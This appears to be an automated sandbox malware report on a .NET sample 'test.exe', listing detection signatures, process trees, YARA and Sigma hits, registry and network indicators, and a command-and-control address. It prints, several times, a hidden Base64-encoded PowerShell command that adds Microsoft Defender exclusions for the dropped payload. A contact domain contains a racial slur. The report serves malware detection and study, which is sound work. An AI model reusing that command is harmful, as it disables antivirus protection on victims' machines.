Windows Analysis Report
test.exe

Overview

General Information

Sample name: test.exe
Analysis ID: 1574666
MD5: 59eab4d3e8b7c383d6e963256ce603d8
SHA1: 367ac5a131bbebce102b0fc56c3f22224fe61b47
SHA256: ea8724ff42a52834a9af9c7d3fe10ac6ff1fe8064e4f1e3e519daf9396a508f0
Tags: exe, user-lontze7
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • test.exe (PID: 2876 cmdline: "C:\Users\user\Desktop\test.exe" MD5: 59EAB4D3E8B7C383D6E963256CE603D8)
  • powershell.exe (PID: 7056 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA= MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WmiPrvSE.exe (PID: 4196 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • Product.exe (PID: 5136 cmdline: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe MD5: 59EAB4D3E8B7C383D6E963256CE603D8)
    • InstallUtil.exe (PID: 6000 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • powershell.exe (PID: 6884 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA= MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Product.exe (PID: 6904 cmdline: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe MD5: 59EAB4D3E8B7C383D6E963256CE603D8)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.2234027771.0000000003B16000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.1508460985.0000000004252000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000004.00000002.1555656031.00000000043C6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.1512992547.0000000005730000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000005.00000002.2739969270.0000000003C96000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
4.2.Product.exe.43c6b88.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
12.2.Product.exe.3b16b88.1.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.test.exe.5730000.12.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
5.2.InstallUtil.exe.3c96b88.0.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.test.exe.42d6b88.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, ProcessId: 7056, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, ProcessId: 7056, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, ProcessId: 7056, ProcessName: powershell.exe
                      No Suricata rule has matched

                      AV Detection

Source: test.exe, Avira: detected
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Avira: detection malicious, Label: HEUR/AGEN.1360822
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Joe Sandbox ML: detected
Source: test.exe, Joe Sandbox ML: detected
Source: test.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: test.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003402000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Plvuxr.pdb source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: test.exe, test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003402000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Plvuxr.pdbx source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Desktop\test.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: global traffic, TCP traffic: 192.168.2.9:49705 -> 103.230.121.81:30120
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: iam.nigga.dad
                      Source: powershell.exe, 00000002.00000002.1746251721.00000251CC70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso

                      System Summary

                      Source: test.exe, DefinitionBridge.cs
                      Large array initialization: FilterEfficientDefinition: array initializer size 543424
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F92E912_2_052F92E9
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F7DA812_2_052F7DA8
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F7D9812_2_052F7D98
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F88DE12_2_052F88DE
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F875112_2_052F8751
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052FCA3212_2_052FCA32
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05434D7012_2_05434D70
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_0543598812_2_05435988
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_054327A012_2_054327A0
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05436E1812_2_05436E18
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05430E8812_2_05430E88
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_0543634812_2_05436348
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_0543279212_2_05432792
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_0543707712_2_05437077
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05436E0812_2_05436E08
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_054350B812_2_054350B8
Source: test.exe Binary or memory string: OriginalFilename vs test.exe
Source: test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs test.exe
Source: test.exe, 00000000.00000002.1505562731.0000000003355000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenametaskschd.dll.muij% vs test.exe
Source: test.exe, 00000000.00000002.1505562731.0000000003355000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs test.exe
Source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs test.exe
Source: test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs test.exe
Source: test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs test.exe
Source: test.exe, 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs test.exe
Source: test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs test.exe
Source: test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs test.exe
Source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePlvuxr.dll" vs test.exe
Source: test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePlvuxr.dll" vs test.exe
Source: test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs test.exe
Source: test.exe, 00000000.00000002.1504186751.000000000118E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs test.exe
Source: test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePlvuxr.dll" vs test.exe
Source: test.exe, 00000000.00000000.1475467152.0000000000C36000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWoouhtlutd.exe" vs test.exe
Source: test.exe Binary or memory string: OriginalFilenameWoouhtlutd.exe" vs test.exe
Source: test.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: test.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Product.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: test.exe, DefinitionBridge.cs Cryptographic APIs: 'CreateDecryptor'
Source: test.exe, ParameterObject.cs Cryptographic APIs: 'CreateDecryptor'
